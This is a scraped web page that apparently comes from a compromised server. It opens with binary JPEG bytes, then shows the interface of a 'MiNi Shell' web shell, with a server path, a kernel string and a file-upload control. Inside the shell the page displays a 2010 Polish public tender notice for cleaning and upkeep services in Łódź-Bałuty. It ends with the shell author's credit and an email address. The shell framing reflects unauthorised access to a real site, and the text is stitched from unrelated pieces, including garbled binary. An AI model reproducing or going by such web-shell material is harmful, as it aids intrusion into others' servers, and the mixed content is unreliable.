JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100804/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100804/237898-N-2010.html

<p class="kh_header"><b>Łódź: Świadczenie Usług Należytego Utrzymania Stanu Sanitarno- Porządkowego Nieruchomości Wraz z Terenami Przynależnymi</b><br>
<b>Numer ogłoszenia: 237898 - 2010; data zamieszczenia: 04.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Nieruchomościami Łódź-Bałuty "Bałuty Nowe" , ul. Sędziowska 16, 91-304 Łódź, woj. łódzkie, tel. 042 6546896, faks 042 6546896.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.biuletyn.abip.pl/an-balnow/ http://www.balutynowe.com3.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie Usług Należytego Utrzymania Stanu Sanitarno- Porządkowego Nieruchomości Wraz z Terenami Przynależnymi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres rzeczowy zamówienia obejmuje następujące prace:

A. bieżące czynności podstawowe
1.	bieżące usuwanie/zamiatanie, zbieranie, zmywanie odpadów i innych zanieczyszczeń z pomieszczeń i urządzeń budynku przeznaczonych do ogólnego użytku: korytarze, klatki schodowe, sienie, kabiny dźwigowe, WC, pralnie, suszarnie, strychy itp.
2.	bieżące usuwanie odpadów i innych zanieczyszczeń z niezabudowanych części nieruchomości tj. podwórzy, przejść, bram, chodników, trawników, opasek ochronnych i jezdni osiedlowych.
3.	Zleceniobiorca zobowiązany jest wywieźć własnym transportem i na własny koszt odpady nie nadające się do składowania w pojemnikach na śmieci /tzn. liście, gałęzie i inne nieczystości nie będące odpadami komunalnymi wielkogabarytowymi/.
4.        Zleceniobiorca zobowiązany jest do ustawienia w rejonie 5 sztuk koszy oznaczonych nalepką w kolorze pomarańczowym przeznaczonych na psie nieczystości. Zobowiązany jest do wykładania  koszy workami foliowymi  a także ich bieżącego opróżniania
5.        Zleceniobiorca zobowiązany jest do ustawienia  5 szt.  koszy ulicznych na odpady stałe w kolorze niebieskim.
           Zobowiązany jest do bieżącego wykładania  koszy workami foliowymi  a także ich opróżniania.
B.	bieżące sprzątanie w okresie zimy - polegające na
1.	usuwaniu śniegu, lodu, błota z chodników, dojść, dojazdów do garaży, ulic osiedlowych, placów zabaw, parkingów osiedlowych, oczyszczanie pokryw studzienek telefonicznych, kanalizacyjnych oraz udrażnianie /odśnieżanie, odkuwanie lodu/ studzienek ściekowych. Czynności te powinny być wykonane do godz. 6.30 rano.
2.	w przypadku opadów śniegu lub oblodzenia praca powinna być wykonana systematycznie na bieżąco, aż do osiągnięcia stanu zapewniającego bezpieczeństwo poruszających się ludzi i pojazdów.
3.        w przypadku wystąpienia gołoledzi wymagane jest posypywanie piaskiem w celu uszorstnienia nawierzchni bez użycia soli i innych środków chemicznych. Zakup piasku należy do obowiązków Zleceniobiorcy.
4.        usuwaniu sopli z dachów. Koszty użycia sprzętu specjalistycznego obciążają Zleceniodawcę.
C.	bieżące sprzątanie - konserwacja terenów zielonych poprzez grabienie, rekultywacja i odtwarzanie  zniszczonych części trawników i kwietników, podlewanie nowych nasadzeń,  sianie trawy i jej koszenie w okresie maj - wrzesień.
           Wywożenie skoszonej trawy w workach foliowych winno odbywać się niezwłocznie po zakończeniu koszenia.
                     Zleceniobiorca winien mieć zawartą umowę z firmą świadczącą usługi  kompostowania.

D.      w zakresie prac wewnątrz budynków oraz mycia elementów stałych budynków z częstotliwością zapewniającą należyty stan sanitarny i porządkowy
1.	mycie klatek schodowych, lamperii, balustrad, drzwi, skrzynek listowych i liczników.
2.        mycie okien i luksferów na klatkach schodowych i w pomieszczeniach ogólnego użytku /pralnie, suszarnie itp./
3.	wykonywanie czynności związanych z dezynfekcją, dezynsekcją i deratyzacją pomieszczeń, urządzeń oraz terenu nieruchomości przeznaczonych do wspólnego użytku. Zakup środków należy do obowiązków Zleceniobiorcy.
4.        obowiązkowe przeprowadzanie prewencyjnej deratyzacji w terminach:
           20 marzec - 20 kwiecień  oraz  15 październik - 15 listopad
5.        oznakowanie miejsc wyłożenia trutek oraz zabezpieczenie przed dostępem do nich dzieci, ptactwa i zwierząt
E.
1.	dokonywanie codziennego przeglądu obsługiwanego terenu ze szczególnym uwzględnieniem: 
a)	- właściwego wykonywania zadań wynikających z przyjętych obowiązków,
b)	- terminowego wykonywania świadczeń wynikających z umów zawartych z usługodawcami
2.	niezwłoczne zawiadamianie Zleceniodawcy o dostrzeżonych uszkodzeniach lub wadliwym działaniu instalacji i urządzeń technicznych znajdujących się na terenie nieruchomości.
3.	zgłaszanie potrzeb dotyczących renowacji zieleni oraz przycinania i wycięcia drzew.
4.	udział w okresowych kontrolach sanitarno-porządkowych organizowanych na terenie objętym umową oraz wykonywanie zaleceń wynikających z tych kontroli.
5.	bezzwłoczne wywieszanie dostarczonych przez Zleceniodawcę informacji w gablotach na klatkach schodowych oraz dopilnowanie ich utrzymania.
6.	terminowe doręczanie Najemcom lokali mieszkalnych i użytkowych oraz użytkownikom zawiadomień o zmianach stawek czynszowych, książeczek czynszowych, powiadomień o konieczności wnoszenia dopłat bądź potrąceń bonifikat za zimną wodę, powiadomień o stanie konta najemcy, upomnień o zaległościach czynszowych i wynikających z innych tytułów w terminie 7 dni od daty przejęcia dokumentów.
7.	terminowe wywieszanie flag państwowych, papieskich i miejskich, w dniach świąt i uroczystości państwowych na terenie wszystkich nieruchomości; zakup flag należy do obowiązków Zleceniobiorcy.
8.	bieżąca wymiana uszkodzonych żarówek w klatkach schodowych i korytarzach w posesjach objętych umową; zakup żarówek należy do obowiązków Zleceniobiorcy.
9.	bieżące usuwanie z budynków oraz pomieszczeń i urządzeń przeznaczonych do wspólnego użytku ogłoszeń, plakatów, afiszy, napisów, rysunków umieszczonych bez zgody administracji.
10.	bieżące opróżnianie koszy przydomowych i ich odkażanie.
11.	bieżące odkażanie dołów kloacznych, ubikacji oraz rynsztoków podwórzowych i ulicznych wapnem chlorowanym lub lizolem; zakup środków chemicznych należy do Zleceniobiorcy.
12.	bieżące mycie i dezynfekowanie pergoli i zsypów, utrzymanie drożności zsypów.
13.	terminowe wystawianie pojemników na śmieci w miejsce dostępne dla odbiorców śmieci oraz ich wstawianie do pergoli, zsypów i innych miejsc do tego wyznaczonych z częstotliwością wskazaną przez Zleceniodawcę.
14.	zabezpieczanie grzejników na parterach budynków, rur wodociągowych w ubikacjach ogólnych oraz hydrantów - zdrojów podwórzowych na okres zimy; zakup materiałów niezbędnych do tego celu należy do obowiązków Zleceniobiorcy.

Niniejszym postępowaniem objęty jest obszar o powierzchni ogółem:
eksploatacyjna wewnętrzna	     	11 979,41 m2
eksploatacyjna zewnętrzna   	          44 642,75 m2
tereny zielone      	                    15 101,93 m2
okna i luksfery			              950,38 m2.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7, 90.60.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wysokość wadium w niniejszym postępowaniu
         wynosi: 5000,00 zł (słownie: pięć tysięcy zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie wykonawcy do art. 22 ust. 1</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych usług w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonywania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie (o wartości minimum 150 000,00 zł w ciągu jednego roku).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien dysponować minimum:
-	Kosiarki - 10 szt.
-	Ciągnik dwuosiowy z przyczepą lub samochód ciężarowy - 1 szt.
-	Urządzenie z pługiem do odśnieżania - 1 szt.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagana minimalna liczba pracowników: 
 -  15 pracowników w tym jedna osoba posiadająca kwalifikacje w zakresie prowadzenia prac ogrodniczych i 1 osoba posiadająca kwalifikacje w zakresie wykonywania dezynfekcji, dezynsekcji i deratyzacji</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>. znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
                            zamówienia (potwierdzenie polisa ubezp. na minimum zaoferowaną kwotę na wykonanie przedmiotu zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenia wykonawcy w celu wykazania podstaw do wykluczenia z art. 24 ust. 1 ustawy Prawo zamówień publicznych 
2. Pełnomocnictwo do reprezentowania wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. w formie spółki cywilnej).
3. Dowód wniesienia wadium
4. Pełnomocnictwo do podpisania oferty.
5.Parafowany wzór umowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.biuletyn.abip.pl/an-balnow/           http://www.balutynowe.com3.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Administracja Nieruchomościami Łódź - Bałuty Bałuty Nowe,  ul. Sędziowska 16, 91-304 Łódź, sekretariat, pokój Nr 10..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.08.2010 godzina 09:15, miejsce: Ofertę należy złożyć w Administracji Nieruchomościami Łódź - Bałuty Bałuty Nowe,  ul. Sędziowska 16, 91-304 Łódź, sekretariat, pokój Nr 10..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com